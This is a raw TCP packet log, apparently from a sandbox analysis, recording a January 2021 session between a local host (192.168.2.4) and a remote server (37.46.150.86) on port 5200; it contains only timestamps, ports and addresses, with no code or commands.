Jan 8, 2021 09:35:22.915004015 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915041924 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915091038 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915124893 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915143013 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915158033 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915169001 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915199041 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915235043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915245056 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915266991 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915298939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915311098 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915332079 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915363073 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915374994 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915395975 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915427923 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915441036 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915467978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915503025 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915513992 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915534019 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915565968 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915577888 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915597916 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915627956 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915661097 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915671110 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915693045 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915697098 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915734053 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915770054 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915802956 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915821075 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915834904 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915849924 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915867090 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915896893 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915927887 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915941954 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915960073 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.915970087 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.915999889 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916035891 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916066885 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916081905 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.916106939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916115999 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.916140079 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916171074 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916182995 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.916202068 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916234016 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916239977 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.916265011 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916296959 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916309118 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.916327953 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916367054 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916378975 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.916403055 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916435003 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916480064 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.916500092 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916529894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916563988 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916575909 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.916596889 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.916640043 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964093924 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964147091 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964169025 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964195013 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964221001 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964246035 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964271069 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964277029 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964297056 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964306116 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964332104 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964335918 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964375973 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964390993 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964421034 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964462042 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964479923 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964505911 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964549065 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964591026 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964612961 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964632988 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964658976 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964664936 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964703083 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964715004 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964739084 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964776039 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964808941 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964818001 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964839935 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964869022 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964874983 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964912891 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964940071 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.964941978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.964976072 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965032101 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965056896 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965070963 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965085030 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965110064 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965118885 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965135098 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965157986 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965162992 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965197086 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965198994 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965240002 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965246916 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965267897 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965300083 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965326071 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965348005 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965351105 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965377092 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965403080 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965435982 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965451956 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965472937 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965507984 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965537071 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965562105 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965565920 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965585947 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965611935 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965620041 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965637922 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965657949 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.965670109 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.965693951 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.012667894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.012713909 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.012753010 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.012792110 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.012830973 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.012855053 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.012868881 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.012876987 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.012906075 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.012944937 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.012949944 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.012990952 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013032913 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013040066 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013071060 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013109922 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013149023 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013150930 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013185978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013223886 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013226986 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013262033 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013307095 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013310909 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013550997 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013586998 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013626099 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013643980 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013672113 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013675928 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013714075 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013751030 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013761997 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013788939 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013788939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013835907 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013878107 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013880014 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013916016 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013952971 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.013963938 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.013991117 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014029026 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014045954 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.014067888 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014105082 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014132023 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.014152050 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014194012 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014205933 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.014230967 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014271021 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014285088 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.014308929 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014344931 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014348984 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.014383078 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014420033 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014466047 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.014467955 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014509916 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014547110 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014558077 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.014600992 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014647961 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:23.014658928 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014710903 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:23.014758110 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.275067091 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322422028 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322449923 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322464943 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322484016 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322500944 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322515965 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322531939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322547913 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322562933 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322578907 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322593927 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322613955 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322630882 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322635889 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322645903 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322663069 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322669029 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322673082 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322679043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322689056 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322695971 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322711945 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322722912 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322727919 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322747946 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322765112 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322773933 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322779894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322796106 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322810888 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322810888 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322829008 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322832108 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322845936 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322859049 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322863102 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322882891 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322895050 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322901011 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322916031 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322931051 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322938919 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322946072 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322961092 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322961092 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322977066 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.322990894 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.322992086 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.323012114 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.323026896 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:25.323043108 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:25.323075056 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:28.250613928 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:32.268827915 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:32.333789110 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:39.600044966 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:39.601119041 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:39.662158012 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:59.615745068 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:59.616543055 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:59.693202972 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:19.631238937 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:19.632263899 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:19.693114996 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:19.959378004 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:19.964934111 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.024930000 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.024956942 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.024970055 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.024987936 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025001049 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025013924 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025026083 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025044918 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025060892 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025075912 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025091887 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025110960 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025127888 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025144100 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025158882 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025173903 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025188923 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025206089 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025207996 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025223017 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025242090 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025252104 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025260925 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025276899 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025293112 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025295019 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025310040 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025325060 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025331974 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025341988 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025357962 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025357962 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025377989 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025405884 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025422096 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025439024 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025446892 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025454044 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025470972 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025485992 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025499105 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025504112 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025521994 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025537968 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025542974 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025553942 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025568962 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025583982 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025583982 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025599003 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025614977 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025634050 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025635004 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025651932 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025666952 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.025667906 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.025685072 CET	5200	49747	37.46.150.86	192.168.2.4
